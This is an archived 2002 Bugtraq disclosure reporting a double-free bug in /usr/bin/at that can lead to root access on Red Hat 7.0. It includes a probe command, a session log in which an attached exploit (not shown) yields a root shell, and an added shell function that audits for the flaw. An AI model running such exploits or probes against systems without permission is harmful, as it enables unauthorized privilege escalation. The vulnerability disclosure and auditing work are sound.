7828881 2002-01-17 13:19 +1300  /51 lines/ zen-parse <zen-parse@gmx.net>
Sent by: joel@lysator.liu.se
Imported: 2002-01-17  18:34  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20581>
Subject: '/usr/bin/at 31337 + vuln' problem + exploit
------------------------------------------------------------
From: zen-parse <zen-parse@gmx.net>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0201171313030.13586-101000@clarity.local>

Affects: /usr/bin/at 

To check if you are potentially vulnerable to this exploit, execute:
  /usr/bin/at 31337 + vuln

If you are vulnerable this will cause:
Segmentation fault 

If not, there will be a message similar to: 
Garbled time
(possibly with some extra information)

The problem is caused by a bug in the parser which deallocates the
same memory location twice.

This can sometimes be exploited, for the uid of "daemon", and due to
some other minor problems, may allow root access from there.

Attached is an exploit for Redhat 7.0.

bash-2.04$ rpm -qf /lib/libc-*
glibc-2.2.4-18.7.0.3
bash-2.04$ rpm -qf /usr/bin/at
at-3.1.8-12
bash-2.04$ tar -xzf attn.tar.gz
bash-2.04$ cd attn
bash-2.04$ id
uid=500(evil) gid=500(evil) groups=500(evil)
bash-2.04$ ./doit.sh
woot-2.04# id
uid=0(root) gid=0(root) groups=500(evil)
woot-2.04# echo "I was just testing something and you need to fix at or some malicious hacker could be evil." |mail -s "Fix /usr/bin/at" root
woot-2.04# exit
bash-2.04$

-- zen-parse

-------------------------------------------------------------------------
1) If this message was posted to a public forum by zen-parse@gmx.net, it 
may be redistributed without modification. 
2) In any other case the contents of this message is confidential and not 
to be distributed in any form without express permission from the author.
This document may contain Unclassified Controlled Nuclear Information.
(7828881) /zen-parse <zen-parse@gmx.net>/-(Reflowed)
Attachment (application/x-gzip) in text 7828882
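
The check described in the message above, wrapped as a script for auditing a
host. This is an added example, not part of the original post; the function
name check_at and its return codes are assumptions made here.

```sh
#!/bin/sh
# Added example, not part of the advisory. check_at is a hypothetical helper
# name. It runs the advisory's probe and classifies the result.
# Return codes: 0 = not vulnerable, 1 = vulnerable, 2 = inconclusive.

check_at() {
    at_bin="${1:-/usr/bin/at}"

    if ! command -v "$at_bin" >/dev/null 2>&1; then
        echo "inconclusive: $at_bin not found"
        return 2
    fi

    # Capture stdout and stderr; stdin is /dev/null so a build that somehow
    # accepts the time string cannot sit waiting for job input.
    # The "|| status=$?" form keeps the script alive under "set -e".
    status=0
    out=$("$at_bin" 31337 + vuln 2>&1 </dev/null) || status=$?

    # A process killed by signal N is reported as 128+N; SIGSEGV is 11.
    if [ "$status" -eq 139 ]; then
        echo "vulnerable: $at_bin died with SIGSEGV on the probe"
        return 1
    fi

    case "$out" in
        *"Garbled time"*)
            echo "not vulnerable: probe rejected as a garbled time"
            return 0
            ;;
    esac

    echo "inconclusive: exit status $status, output: $out"
    return 2
}
```

Calling check_at with no argument probes /usr/bin/at; any result other than
the two outcomes named in the message is reported as inconclusive.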
7828882 2002-01-17 13:19 +1300  /25 lines/ zen-parse <zen-parse@gmx.net>
Attachment file name: "attn.tar.gz"
Imported: 2002-01-17  18:34  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20582>
Attachment (text/plain) to text 7828881
Subject: Attachment (attn.tar.gz) to: '/usr/bin/at 31337 + vuln' problem + exploit
------------------------------------------------------------
(7828882) /zen-parse <zen-parse@gmx.net>/-(Reflowed)